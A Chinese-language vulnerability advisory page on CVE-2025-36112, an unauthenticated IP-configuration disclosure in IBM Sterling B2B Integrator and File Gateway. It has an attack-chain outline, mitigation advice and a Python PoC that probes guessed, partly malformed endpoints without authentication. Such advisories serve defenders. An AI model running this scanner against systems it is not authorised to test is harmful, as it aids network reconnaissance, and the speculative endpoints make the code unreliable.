IPBUF安全漏洞报告
English
CVE-2025-36112 CVSS 5.3 中危

CVE-2025-36112: IBM Sterling B2B Integrator 敏感信息泄露漏洞

披露日期: 2025-11-24
来源: [email protected]

漏洞信息

漏洞编号
CVE-2025-36112
漏洞类型
信息泄露
CVSS评分
5.3 中危
攻击向量
网络 (AV:N)
认证要求
无需认证 (PR:N)
用户交互
无需交互 (UI:N)
影响产品
IBM Sterling B2B Integrator, IBM Sterling File Gateway

相关标签

CVE-2025-36112信息泄露IBM SterlingB2B IntegratorSterling File Gateway未授权访问IP配置泄露中间件漏洞企业应用安全

漏洞概述

CVE-2025-36112是IBM Sterling B2B Integrator和IBM Sterling File Gateway产品中的一个中等严重性信息泄露漏洞。该漏洞存在于IBM Sterling B2B Integrator 6.0.0.0至6.1.2.7版本、6.2.0.0至6.2.0.5版本以及6.2.1.1版本中。攻击者可以在无需任何认证的情况下,通过发送特制的网络请求访问目标系统,从而获取敏感的服务器IP配置信息。这些信息可能包括内部网络拓扑、服务器地址、路由配置等敏感数据。CVSS评分5.3表明该漏洞对机密性有较低影响,不需要特殊权限或用户交互即可被利用,但攻击复杂度较低,攻击者可以通过网络直接发起攻击。泄露的IP配置信息可能被用于进一步的侦察活动,帮助攻击者了解目标网络架构,为后续更复杂的攻击做准备。

技术细节

该漏洞属于敏感信息泄露类型,攻击者利用未授权访问接口获取服务器敏感配置信息。漏洞主要影响IBM Sterling B2B Integrator的网络配置管理模块,攻击者可以通过构造特定的HTTP请求或API调用,无需提供任何认证凭据即可触发信息泄露。泄露的信息包括但不限于服务器IP地址、子网掩码、网关配置、DNS服务器设置等网络层配置参数。从攻击向量来看,该漏洞可通过网络远程利用(AV:N),无需认证(PR:N),无需用户交互(UI:N),这意味着任何能够访问到目标系统网络端口的攻击者都可能利用此漏洞。CVSS向量CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N表明该漏洞主要影响机密性(Confidentiality Impact: Low),完整性和可用性不受影响。攻击者获取的IP配置信息可被用于绘制目标网络拓扑图,为后续的横向移动和数据窃取攻击提供情报支持。

攻击链分析

STEP 1
侦察阶段
攻击者通过端口扫描和服务识别发现目标服务器运行IBM Sterling B2B Integrator或Sterling File Gateway服务
STEP 2
探测阶段
攻击者识别未授权可访问的网络配置接口,尝试访问可能暴露IP配置的端点
STEP 3
信息收集
攻击者发送特制请求获取敏感服务器IP配置信息,包括内部网络地址、子网掩码、网关等
STEP 4
数据利用
攻击者分析获取的IP配置信息,绘制目标网络拓扑图,为后续横向移动或深度攻击做准备

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import requests # CVE-2025-36112 PoC - Information Disclosure # Target: IBM Sterling B2B Integrator / Sterling File Gateway # Vulnerability: Sensitive server IP configuration information disclosure def check_vulnerability(target_url): """ Check if target is vulnerable to CVE-2025-36112 """ # Common endpoints that may expose IP configuration endpoints = [ '/ SterlingConfigurator/getIPConfig', '/ SterlingFileGateway/api/network/config', '/ SterlingB2B/api/v1/system/network', '/config/networkSettings', '/admin/networkConfiguration' ] for endpoint in endpoints: url = target_url.rstrip('/') + endpoint try: # Send unauthenticated request response = requests.get(url, timeout=10, verify=False) # Check if response contains sensitive IP configuration if response.status_code == 200: content = response.text.lower() # Indicators of IP configuration disclosure if any(keyword in content for keyword in ['ip address', 'subnet', 'gateway', 'dns', 'netmask']): print(f'[+] Potential vulnerability found at: {url}') print(f'[+] Response contains IP configuration data') return True except requests.exceptions.RequestException: continue return False def main(): target = input('Enter target URL: ') if check_vulnerability(target): print('[!] Target appears to be vulnerable to CVE-2025-36112') else: print('[-] Target does not appear to be vulnerable') if __name__ == '__main__': main()

影响范围

IBM Sterling B2B Integrator 6.0.0.0 - 6.1.2.7
IBM Sterling B2B Integrator 6.2.0.0 - 6.2.0.5
IBM Sterling B2B Integrator 6.2.1.1
IBM Sterling File Gateway 6.0.0.0 - 6.1.2.7
IBM Sterling File Gateway 6.2.0.0 - 6.2.0.5
IBM Sterling File Gateway 6.2.1.1

防御指南

临时缓解措施
在官方补丁发布之前,建议采取以下临时缓解措施:1)通过防火墙或网络访问控制列表限制对IBM Sterling管理接口的网络访问,只允许受信任的IP地址访问;2)启用详细的审计日志记录所有管理接口的访问尝试,以便及时发现异常访问行为;3)实施IP白名单机制,确保只有授权的管理终端可以访问配置接口;4)考虑在网络边界部署入侵检测/防御系统(IDS/IPS)监控可疑的网络流量;5)定期检查系统日志,查找未经授权的配置查询请求。

参考链接

法律声明

以上信息仅供安全研究和授权渗透测试使用。未经授权对他人系统进行测试属于违法行为。利用本报告内容进行非法活动者,后果自负。

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表